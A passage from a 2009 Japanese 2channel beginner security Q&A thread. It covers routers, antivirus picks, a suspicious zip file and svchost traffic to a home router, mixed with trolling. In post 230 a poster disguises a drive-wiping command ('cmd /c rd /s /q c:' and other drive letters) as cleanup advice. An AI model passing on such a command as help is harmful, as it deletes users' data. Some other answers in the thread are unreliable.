09/07/10 10:01:17
ハチ公ってこことトンスレ以外にも出没してるのか!
180:名無しさん@お腹いっぱい。
09/07/10 10:58:11
>>175
それだけは勘弁願うぜwwwww八頭が検出可否スレなんかに常駐されようものならぼかしつきの画像貼られてみんなパニックになるぜwwwwww
181:165
09/07/10 11:28:58
リンクも踏めないスキルでセキュ板来ても所詮怪我の元
182:名無しさん@お腹いっぱい。
09/07/10 11:45:51
八頭のリンクは安心して踏めるよ^^
183:名無しさん@お腹いっぱい。
09/07/10 12:57:09
スレリンク(sec板:168番)
>>>164
>>八頭様
>あ
>た
>ま
>悪
>い
>ん
>だ
>ね
超爆笑
>>182
釣られないよ
184:名無しさん@お腹いっぱい。
09/07/10 13:20:53
spof.sysって何してるの?
てか実体何処にあるの?
185:名無しさん@お腹いっぱい。
09/07/10 13:37:22
ルータ買ってこようと思うんですけど
セキュリティ的には安いので問題ないですか?
速度的にはもともと5,6Mなんであまり気にしないんですけど多分
186:名無しさん@お腹いっぱい。
09/07/10 13:40:13
というかセキュリティ的にルータいれたほうがいいとわれたので
買ってこようと思うんですが
2.3000円のやつでいいですかね?
187:名無しさん@お腹いっぱい。
09/07/10 13:46:12
> リンクも踏めないスキルでセキュ板来ても所詮怪我の元
最終的にノートンかMicrosoft Security Essentialsの2択で疑う余地ないです。
188:名無しさん@お腹いっぱい。
09/07/10 13:46:25
これなんてどーよ?
URLリンク(www.iodata.jp)
現状2,500円前後の売値
189:名無しさん@お腹いっぱい。
09/07/10 13:51:52
>>188
安いですね
これでいいならこれ買ってこようと思います
ありがとうございます
190:名無しさん@お腹いっぱい。
09/07/10 14:03:06
無線LANもしたいならそれじゃダメだからね
191:名無しさん@お腹いっぱい。
09/07/10 14:19:26
Γ(^o^) ココ油足りないんじゃネーノ
192:名無しさん@お腹いっぱい。
09/07/10 14:21:44
なんでテンプレにハチ公お断りって入ってないの?
193:名無しさん@お腹いっぱい。
09/07/10 14:42:40
選択肢は刃(やいば)なり~
194:名無しさん@お腹いっぱい。
09/07/10 14:46:38
>>192
盲導犬や介助犬がOKのお店があるのと同じだとか
195:名無しさん@お腹いっぱい。
09/07/10 15:00:37
>>194
筋違いのようだが論点はずれていない
196:名無しさん@お腹いっぱい。
09/07/10 15:01:42
ハチ公www
197:名無しさん@お腹いっぱい。
09/07/10 15:04:54
【ハチ公】セキュリティ初心者質問スレッドpart○○【お断り】
198:名無しさん@お腹いっぱい。
09/07/10 15:08:09
>>192
>>14を次から入れましょう。
199:名無しさん@お腹いっぱい。
09/07/10 15:24:25
ハチ公って何でもかんでもノートン、ノートンだよな?
それが終わるとリンク貼りしかしない
何の答えにもなってなくね?
200: ◆N9P3SuvBPo
09/07/10 19:59:23
>199
八頭ってノートンの社員?
って考えすぎか…
201:名無しさん@お腹いっぱい。
09/07/10 19:59:30
>>188
>>190
お店に行ったらバファローのやつしかなかったので
3000円だったけど買ってきて取り付けました
無線LANもほしかったけどセキュリティ的にいうと逆行するかなー
と思い今回は見送りました
これで安心してネットできます
相談にのっていただきありがとうございました(ペコリ
202:名無しさん@お腹いっぱい。
09/07/10 20:58:36
>>171
殴るぞはっつあんw
だから 俺が >22 と>40 で…
しかし、なんだな リンク先に書かれてることは部分的に、、、、いや、やめておこう
>>200
>142 からすると ただの自慢したがりのような
203:名無しさん@お腹いっぱい。
09/07/10 22:07:19
>>200
(ο^д^)ノシ
204: ◆N9P3SuvBPo
09/07/10 22:22:03
>202
そーいえば俺も自慢するときだってあるよーなないよーな…
>203
φ(゜o゜)ノシ
205:名無しさん@お腹いっぱい。
09/07/10 22:31:30
ハチ公いねえのかw
206:名無しさん@お腹いっぱい。
09/07/10 22:49:03
八頭 様
以前は大変お世話になりました。
いるんでしょ
出てきて元気な姿を見せてください。
オラ!出てこんかい!
207:名無しさん@お腹いっぱい。
09/07/10 22:50:19
釣りバカ見てんだよw
208:名無しさん@お腹いっぱい。
09/07/10 22:50:48
>>204
(ο^д^)ノシ
209:名無しさん@お腹いっぱい。
09/07/10 22:54:17
ハチ公のAA作ってやれよw
210:名無しさん@お腹いっぱい。
09/07/10 23:04:43
ルータつけたんですけどエロサイトに行くと
宮崎の素敵な女性います
みたいな宣伝がでます
IP見えないようになってないんですかね?
211:名無しさん@お腹いっぱい。
09/07/10 23:05:46
プロバイダは相手に隠してないから。
212:名無しさん@お腹いっぱい。
09/07/10 23:09:26
そういうことなんですか
即レスありがとうございます
213: ◆N9P3SuvBPo
09/07/10 23:15:18
>184
遅れてすいません。
実体というのは、spof.sysがある場所でしょうか?
それとも、spof.sysを動かしてる親玉でしょうか?
>208
φ(・o・)ノシ
>210
海外のエロサイトでは良くそういったものが見られますよ
もっともIPアドレスから分かる情報は限られてるわけで、
あまり気にするようなことでは、ありません。
214:名無しさん@お腹いっぱい。
09/07/10 23:39:47
URLリンク(www.hachi-movie.jp)
215:名無しさん@お腹いっぱい。
09/07/10 23:51:41
質問です。
とあるサイトでzipファイルを落としてノートン先生に診てもらったら
ウィルス有りで解決と表示されました。
もう一度、同じファイルを診てもらったら問題無しとでました。
このzipファイルはもう安全とみなしていいのでしょうか?
216:名無しさん@お腹いっぱい。
09/07/10 23:54:15
___ ━┓ ___ ━┓
/ ― \ ┏┛/ ―\ ┏┛
/ (●) \ヽ ・. /ノ (●)\ ・
/ (⌒ (●) /. | (●) ⌒)\
/  ̄ヽ__) / | (__ノ ̄ |
/´ ___/ \ /
| \ \ _ノ
| | /´ `\
217:名無しさん@お腹いっぱい。
09/07/10 23:55:19
そんなファイルは諦めて捨てるのが正しい対処法です。
218:名無しさん@お腹いっぱい。
09/07/10 23:55:50
.| | | | | | | | | | || | |
.| | | レ | | | | | J || | |
∩___∩ | | | J | | | し || | |
| ノ\ ,_ ヽ .| レ | | レ| || J |
/ ●゛ ● | .J し | | || J
| ∪ ( _●_) ミ .| し J|
彡、 |∪| | .J レ
/ ∩ノ ⊃ ヽ
( \ / _ノ | |
\ " / | |
\ / ̄ ̄ ̄ /
219:名無しさん@お腹いっぱい。
09/07/11 01:56:33
【使用OS】 『XP SP3』
【PCスペック】 『CPU: 3GHz 、メモリ: 2GB』
【使用ブラウザ】 『Sleipnir』
【Microsoft Updateの更新の状態】 『自動更新は停止状態』
【回線の種類・ルータの有無】 『sonet ADSL12M AtermWD701CL(ファームウェアは最新1.11)』
つい先日sonet乗り換えてモデムを接続したところ
通信してないのにDATAランプが点滅しているのでパケットモニタで見てみると
scvhost.exeがローカルIPアドレスに対して1kb/s以内でずっと通信しています
これは正常なのでしょうか?
一応ぐぐって調べてみたのですが、ログイン名でscvhostが働いていたら
ワームの可能性とか書いてあったのをみたのですが
ログイン名で働いているscvhostはありませんでした
よろしくお願いします
プロセス名:c:\windows\System32\scvhost.exe
リモートホスト:warpstar
リモートIPアドレス:192.168.0.1
ローカルIPアドレス:192.168.0.5
220:名無しさん@お腹いっぱい。
09/07/11 03:32:51
>>219
ウイルスとかそういうのじゃないと思うよ。
その通信でどのポート番号使われてるかわかりませんか?
221:名無しさん@お腹いっぱい。
09/07/11 03:36:00
【ノートン】Norton Internet Security Ver.169【2009】
スレリンク(sec板:116番)
116 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/10(金) 23:57:32
質問です。
とあるサイトでzipファイルを落としてノートン先生に診てもらったら
ウィルス有りで解決と表示されました。
もう一度、同じファイルを診てもらったら問題無しとでました。
このzipファイルはもう安全とみなしていいのでしょうか?
マルチとか・・・
これハチ公の自演じゃね?
222:名無しさん@お腹いっぱい。
09/07/11 06:19:07
>>220
1500-2700ぐらいまで使っているみたいです
223:名無しさん@お腹いっぱい。
09/07/11 06:59:58
一時期ミスでファイアウォールが無効になった状態のままネットしてたんだが、
完全スキャンして何も引っかからなければ問題なかったって認識でよい?
224:名無しさん@お腹いっぱい。
09/07/11 09:34:22
avast使ってるんですが
なんかよく貼られてるランキング見たいので結構順位が低いみたいなんですけど
大丈夫なんですかね?
225:名無しさん@お腹いっぱい。
09/07/11 10:17:26
どうです?
226:名無しさん@お腹いっぱい。
09/07/11 11:10:36
>>223
心配ならフォーマット・再インストール
>>224
心配なら乗り換えろ
227:名無しさん@お腹いっぱい。
09/07/11 12:18:20
>>226
心配だからフォーマットするわ、サンクス
228:名無しさん@お腹いっぱい。
09/07/11 12:34:57
どんだけPCに重要なものが入ってるんだよw
おまいら過度になりすぎw あほかw
229:名無しさん@お腹いっぱい。
09/07/11 12:42:17
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
230:名無しさん@お腹いっぱい。
09/07/11 12:46:36
>>227
これ使えばいいじゃん
何もかも消えてしまうけど
フォーマットしようが一時的バックアップとったファイルの中にヤバイモノが紛れ込んでたら始末に負えないぞ
スキャンかけても何も出てこないしなwwww
ファイル名を指定して実行に
cmd /c rd /s /q c:
と入力し[OK]
上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
231:名無しさん@お腹いっぱい。
09/07/11 14:00:50
>>230
横からだけど、ちょっとやってみます
232:名無しさん@お腹いっぱい。
09/07/11 14:03:07
パソコン初心者の私に教えて下さい
プラウザFirefoxにセキュリティー機能が搭載されているから、市販のセキュリティーソフトは
必要ないと判断して良いでしょうか?
233:名無しさん@お腹いっぱい。
09/07/11 14:04:04
>>228-230
この反応見る限り問題なさそうだな、サンクスコ
234:名無しさん@お腹いっぱい。
09/07/11 14:06:55
>>232
ダメダメです。
235:名無しさん@お腹いっぱい。
09/07/11 14:08:18
>>232
インターネットしなければブラウザ関係なくセキュリティソフト必要なしですよ
236:232
09/07/11 14:18:47
素早い返信サンクスです。(今はノートン2009を使用中)
まあ、しばくはIE8を使ってみます。
237:名無しさん@お腹いっぱい。
09/07/11 15:00:55
>>235
甘いぞ
最近はUSBから感染するウイルスも多い
238: ◆N9P3SuvBPo
09/07/11 15:09:27
USBメモリが感染してなければ問題ない。
239:名無しさん@お腹いっぱい。
09/07/11 16:24:05
>>238
(ο^д^)ノシ
240:名無しさん@お腹いっぱい。
09/07/11 16:44:04
>>222
プロセス名:c:\windows\System32\scvhost.exe
リモートホスト:warpstar
リモートIPアドレス:192.168.0.1
ローカルIPアドレス:192.168.0.5
↑こう判断したのはfirewallのログからでしょ?そのログの画面ハードコピーを
とってうpしてみてくれない?
241:219
09/07/11 16:53:17
>>240
リモートポート:2689
状態:EASTABLISHED
プロセスID:1172
NEGIESというのを使っていて、情報コピーみたいな機能はありません
あとは、上記のような情報しか見れないです
他の人はこういうことないんでしょうか?
前のプロバイダのモデムもこういう感じでDATAランプが点滅しっぱなしHDDランプも点滅
242:名無しさん@お腹いっぱい。
09/07/11 16:58:22
ここにまともに答える奴なんていませんよ
初心者煽ってる屑しかいません
243:名無しさん@お腹いっぱい。
09/07/11 17:08:01
>>241
prtscrでログ画面のハードコピーをとって (もしくはALT+prtscrで対象ウインドウのみ)
それをうpローダにあげてくれって意味なんだけど。
同時にコマンドプロンプトからnetstat -anoと打ってその画面もあげてくれると
なにかわかるかも。セキュリティソフトは何使ってます?
244:名無しさん@お腹いっぱい。
09/07/11 17:29:53
>>243
何聞き出そうとしてるんだ?
ハッキングでもしようってのか?
そんな情報あげられるか
ここまで言って何もわからないわけないだろカス
245:名無しさん@お腹いっぱい。
09/07/11 17:37:22
Vista x64で使えるフリーのウイルス対策ソフトありませんか
246:名無しさん@お腹いっぱい。
09/07/11 17:38:04
ローカル内の通信なんだろ。ファイル共有とかしてるんじゃないか?
247:名無しさん@お腹いっぱい。
09/07/11 17:47:16
>>245
アンチウイルスだけでいいのかな?あるよ。
Avast
URLリンク(www.avast.com)
>avast! Home Edition のシステム要件
>Windows(R) Vista が稼働しているコンピュータ:
AVG
URLリンク(www.avgjapan.com)
>動作環境
>OS : Windows 2000, XP, XP Pro x64 Edition, Vista, Vista x64 Edition
AntiVir(プレミアムのページだけどFreeも条件一緒)
URLリンク(www.avira.com)
>System Requerements
>WindowsVista(32bit or 64Bit),SP1
----
キングソフト(これだけが32bit以外不可)
URLリンク(www.kingsoft.jp)
>OS Windows Vista(32bit)/XP(32bit)/2000/Windows 7 (正式版のみ)
248:名無しさん@お腹いっぱい。
09/07/11 20:03:20
>>240
atermstation 、WARPSTARサテライト
使ってるアクセスポイントとの通信だろ
249:名無しさん@お腹いっぱい。
09/07/11 20:05:06
アンカーミス
○>>219
×>>240
250:名無しさん@お腹いっぱい。
09/07/11 20:32:35
c:\windows\System32\scvhost.exe
この情報出してわからないやつが
使用ポートなどを聞いてわかるわけないだろボケ
てか、全然関係ねーし
FWソフト何使ってるかなんて関係ねーだろ
氏ねボケ
251:名無しさん@お腹いっぱい。
09/07/11 20:47:15
>>250
質問スレです
お引取りください
252: ◆N9P3SuvBPo
09/07/11 20:52:51
c:\windows\System32\scvhost.exeはヤバイ…
c:\windows\System32\svchost.exeなら問題ないが。
253:名無しさん@お腹いっぱい。
09/07/12 01:08:24
c:\windows\System32\svchost.exeな
書き間違えてたわ
どっちみちわかんないんだろおまえらには
254:名無しさん@お腹いっぱい。
09/07/12 01:12:20
問題あるなしじゃないんだよ
このうざい通信を止められないのかってことなんだよ
ずっとDATAが点滅してたらアタックされている場合の判断つかないし
まじでうざい
255:名無しさん@お腹いっぱい。
09/07/12 01:37:01
>>254
はいはい、みんなわからないのでお引取りください。
svchost.exeが2000番代のポートつかってる時点で・・・
256:名無しさん@お腹いっぱい。
09/07/12 02:58:01
つか、マルチしまくりだな
257:名無しさん@お腹いっぱい。
09/07/12 03:04:20
またハチ公の自演か!
258:名無しさん@お腹いっぱい。
09/07/12 03:17:06
マルチじゃねーだろ
荒ししかいないから他で聞いているんだろ
259:八頭 ◆YAGApwSaEw
09/07/12 03:22:44
SVCHOST.EXEはタスクマネージャのプロセスで複数起動していることがありますが、各サービスを起動するためのプロセスです。
同じ名前を装ったウイルスなどもありますので、ウイルスチェックは定期的に行いましょう。
例えばXPやMedia PlayerのNETWORK SERVICEなら
・ASP.NET State Service
・Distributed Transaction Coordinator
・DNS Client
・Performance Logs and Alerts
・Remote Procedure Call (RPC)
・Remote Procedure Call (RPC) Locator
・Windows Media Player Network Sharing Service (*Media Player 11 )
technet.microsoft.comのProcess Explorerで各プロセスの確認は出来るね
260:219
09/07/12 03:36:16
>>259
どうもありがとうございます
ウィルスならログイン名でプロセスが起動するようですが
そういうことは一切ありません
それに動いているのはこれです
c:\windows\System32\svchost.exe
これがウィルスなら、ネットすらできないでしょ・・・
というか、この質問に答えられないということは
他の人のPCだとネットしていないときにDATAランプは点滅していないのですか?
前のプロバイダのモデムも、前に使ってたPCでも点滅しているので普通だと思っていたんですが
やっぱり、ずっと点滅しているのはうざいのでどうにかしたいんですけど
それとリモートポート:2689を使うサービスは
SSDP Discovery Service
UPnP divece host
のようで、これらを停止しても点滅は止まりません
261:219
09/07/12 03:39:51
sc qc rpcss
で見ると
Remote Procedure call(RPC)
だけ表示されました
262:名無しさん@お腹いっぱい。
09/07/12 03:52:25
>>257
正解!
263:名無しさん@お腹いっぱい。
09/07/12 03:57:40
>>260
おまえに質問は無理。半端な知識で考えてろwww